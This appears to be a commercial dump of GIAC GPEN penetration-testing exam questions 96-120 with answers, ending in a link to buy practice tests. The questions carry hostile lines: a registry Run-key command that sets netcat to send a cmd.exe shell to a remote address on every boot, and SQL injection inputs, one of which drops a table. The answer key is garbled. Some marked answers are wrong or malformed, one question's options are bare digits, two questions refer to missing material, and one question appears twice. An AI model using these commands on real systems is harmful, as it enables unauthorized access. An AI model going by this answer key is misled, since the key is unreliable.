[UPDATED Feb-2024] Best Value Available Preparation Guide for GPEN Exam [Q96-Q120]

[UPDATED Feb-2024] Best Value Available Preparation Guide for GPEN Exam

1 Full GPEN Practice Test and 405 Unique Questions, Get it Now!

The GPEN certification exam is designed to evaluate the skills and knowledge of individuals in the field of penetration testing. It tests individuals on their knowledge of modern penetration testing methodology, techniques, tools, and technologies. It covers topics such as threat modeling, perimeter security, web application security, network security and much more.

GIAC GPEN certification exam is a challenging and rigorous exam that tests a candidate’s knowledge and skills in the field of penetration testing. Candidates who pass the exam are recognized as experts in the field and are highly valued by employers and clients. If you are a cybersecurity professional looking to validate your skills and increase your career prospects in the field of penetration testing, the GPEN certification is an excellent option to consider.

 

NEW QUESTION # 96
SIMULATION
Fill in the blank with the appropriate act name.
The___ act gives consumers the right to ask emailers to stop spamming them.

Answer:

Explanation:
CAN-SPAM

NEW QUESTION # 97
All of the following are advantages of using the Metasploitpriv module for dumping hashes from a local Windows machine EXCEPT:

• A. LSASS related reboot problems aren't an Issue
• B. Doesn't require SMB or NetBIOS access to the target machine
• C. Provides less evidence for forensics Investigators to recover
• D. Can run inside of a process owned by any user

Answer: D

Explanation:
Explanation/Reference:
Reference:
http://www.vita.virginia.gov/uploadedFiles/VITA_Main_Public/Security/Meetings/ ISOAG/2012/2012_Jan_ISOAG.pdf

NEW QUESTION # 98
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He is using a tool to crack the wireless encryption keys. The description of the tool is as follows:

Which of the following tools is John using to crack the wireless encryption keys?

• A. Kismet
• B. Cain
• C. AirSnort
• D. PsPasswd

Answer: C

NEW QUESTION # 99
You run the following command while using Nikto Web scanner:
perl nikto.pl -h 192.168.0.1 -p 443
What action do you want to perform?

• A. Seting Nikto for network sniffing.
• B. Port scanning.
• C. Using it as a proxy server.
• D. Updating Nikto.

Answer: B

NEW QUESTION # 100
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t
REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

• A. You want to set the Netcat to execute command any time.
• B. You want to add the Netcat command to the Windows registry.
• C. You want to put Netcat in the stealth mode.
• D. You want to perform banner grabbing.

Answer: A,B,C

NEW QUESTION # 101
Adam works on a Linux system. He is using Sendmail as the primary application to transmit emails.
Linux uses Syslog to maintain logs of what has occurred on the system. Which of the following log files contains e-mail information such as source and destination IP addresses, date and time stamps etc?

• A. /var/log/mailog
• B. /log/var/logd
• C. /var/log/logmail
• D. /log/var/mailog

Answer: A

NEW QUESTION # 102
Which of the following worms performs random scanning?

• A. BugBear
• B. Code red worm
• C. Klez
• D. SirCam

Answer: B

NEW QUESTION # 103
What section of the penetration test or ethical hacking engagement final report is used to detail and prioritize the results of your testing?

• A. Executive Summary
• B. Conclusions
• C. Findings
• D. Methodology

Answer: A

Explanation:
Section: Volume A

NEW QUESTION # 104
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. In order to do so, he performs the following steps of the preattack phase successfully:
Information gathering
Determination of network range
Identification of active systems
Location of open ports and applications
Now, which of the following tasks should he perform next?

• A. Perform OS fingerprinting on the We-are-secure network.
• B. Install a backdoor to log in remotely on the We-are-secure server.
• C. Map the network of We-are-secure Inc.
• D. Fingerprint the services running on the we-are-secure network.

Answer: A

Explanation:
Section: Volume C

NEW QUESTION # 105
You work as a Network Administrator for Tech Perfect Inc. The company has a Windows Active Directory-based single domain single forest network. The functional level of the forest is Windows Server 2003. The company has recently provided laptops to its sales team members. You have configured access points in the network to enable a wireless network. The company's security policy states that all users using laptops must use smart cards for authentication. Which of the following authentication techniques will you use to implement the security policy of the company?

• A. Pre-shared key
• B. IEEE 802.1X using EAP-TLS
• C. IEEE 802.1X using PEAP-MS-CHAP
• D. Open system

Answer: B

NEW QUESTION # 106
Which of the following are the drawbacks of the NTLM Web authentication scheme?
Each correct answer represents a complete solution. Choose all that apply.

• A. The password is sent in hashed format to the Web server.
• B. It can be brute forced easily.
• C. The password is sent in clear text format to the Web server.
• D. It works only with Microsoft Internet Explorer.

Answer: B,D

NEW QUESTION # 107
You work as a Network Security Analyzer. You got a suspicious email while working on a forensic project. Now, you want to know the IP address of the sender so that you can analyze various information such as the actual location, domain information, operating system being used, contact information, etc. of the email sender with the help of various tools and resources. You also want to check whether this email is fake or real. You know that analysis of email headers is a good starting point in such cases. The email header of the suspicious email is given below: What is the IP address of the sender of this email?

• A. 141.1.1.1
• B. 172.16.10.90
• C. 216.168.54.25
• D. 209.191.91.180

Answer: C

NEW QUESTION # 108
While performing a code audit, you discover a SQL injection vulnerability assuming the following vulnerable query, what user input could be injected to make the query true and return data?
select * from widgets where name = '[user-input]';

• A. 'or 1=1
• B. `or l=l...
• C. 'or 1=1--
• D. `or l=1'

Answer: D

NEW QUESTION # 109
Which of the following tools can be used to enumerate networks that have blocked ICMP Echo packets, however, failed to block timestamp or information packet or not performing sniffing of trusted addresses, and it also supports spoofing and promiscuous listening for reply packets?

• A. Nessus
• B. Zenmap
• C. Icmpenum
• D. Nmap

Answer: C

NEW QUESTION # 110
You are pen testing a Windows system remotely via a raw netcat shell. You want to quickly change directories to where the Windows operating system resides, what command could you use?

• A. cd /systemroot/
• B. cd-
• C. cd %systemroot%
• D. cd systemroot

Answer: B

NEW QUESTION # 111
Which of the following statements are true about KisMAC?

• A. Data generated by KisMAC can also be saved in pcap format.
• B. It scans for networks passively on supported cards.
• C. It cracks WEP and WPA keys by Rainbow attack or by dictionary attack.
• D. It is a wireless network discovery tool for Mac OS X.

Answer: A,B,D

NEW QUESTION # 112
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. In order to do so, he performs the following steps of the preattack phase successfully:
Information gathering
Determination of network range
Identification of active systems
Location of open ports and applications
Now, which of the following tasks should he perform next?

• A. Perform OS fingerprinting on the We-are-secure network.
• B. Install a backdoor to log in remotely on the We-are-secure server.
• C. Map the network of We-are-secure Inc.
• D. Fingerprint the services running on the we-are-secure network.

Answer: A

NEW QUESTION # 113
Which of the following is the number of bits of encryption that 64-bit Wired Equivalent Privacy (WEP) effectively provides?

• A. 0
• B. 1
• C. 2
• D. 3

Answer: B

Explanation:
Section: Volume A
Explanation/Reference:
http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy

NEW QUESTION # 114
You work as a Network Penetration tester in the Secure Inc. Your company takes the projects to test the security of various companies. Recently, Secure Inc. has assigned you a project to test the security of a Web site. You go to the Web site login page and you run the following SQL query:
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = '[email protected]'; DROP TABLE members; --'
What task will the above SQL query perform?

• A. Deletes the entire members table.
• B. Deletes the rows of members table where email id is '[email protected]' given.
• C. Performs the XSS attacks.
• D. Deletes the database in which members table resides.

Answer: A

NEW QUESTION # 115
As a professional hacker, you want to crack the security of secureserver.com. For this, in the information gathering step, you performed scanning with the help of nmap utility to retrieve as many different protocols as possible being used by the secureserver.com so that you could get the accurate knowledge about what services were being used by the secure server.com. Which of the following nmap switches have you used to accomplish the task?

• A. nmap -sS
• B. nmap -sT
• C. nmap -vO
• D. nmap -sO

Answer: D

NEW QUESTION # 116
Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?

• A. SARA
• B. Nmap
• C. Whishker
• D. Nessus

Answer: D

Explanation:
Section: Volume C

NEW QUESTION # 117
You want to integrate the Nikto tool with nessus vulnerability scanner. Which of the following steps will you take to accomplish the task?
Each correct answer represents a complete solution. Choose two.

• A. Place the directory containing nikto.pl in root's PATH environment variable.
• B. Place nikto.pl file in the /etc/nessus directory.
• C. Place nikto.pl file in the /var/www directory.
• D. Restart nessusd service.

Answer: A,D

NEW QUESTION # 118
Which of the following Penetration Testing steps includes network mapping and OS fingerprinting?

• A. Exploit
• B. Gather information
• C. Planning stage
• D. Verify vulnerabilities

Answer: B

NEW QUESTION # 119
The employees of EWS Inc. require remote access to the company's Web servers. In order to provide solid wireless security, the company uses EAP-TLS as the authentication protocol. Which of the following statements are true about EAP-TLS?
Each correct answer represents a complete solution. Choose all that apply.

• A. It provides a moderate level of security.
• B. It is supported by all manufacturers of wireless LAN hardware and software.
• C. It uses password hash for client authentication.
• D. It uses a public key certificate for server authentication.

Answer: B,D

Explanation:
Section: Volume B

NEW QUESTION # 120
......

GIAC GPEN certification exam is a valuable credential for professionals who want to demonstrate their advanced skills in penetration testing. Obtaining this certification helps professionals stand out in the field of cybersecurity and demonstrates their commitment to upholding the highest standards of ethical conduct. With the ever-increasing threat of cyber-attacks, organizations need professionals with expertise in penetration testing to help identify and mitigate risk. The GPEN exam provides the necessary training and evaluation to ensure professionals are adequately equipped to perform this role.

 

Get Instant Access to GPEN Practice Exam Questions: https://prep4sure.real4prep.com/GPEN-exam.html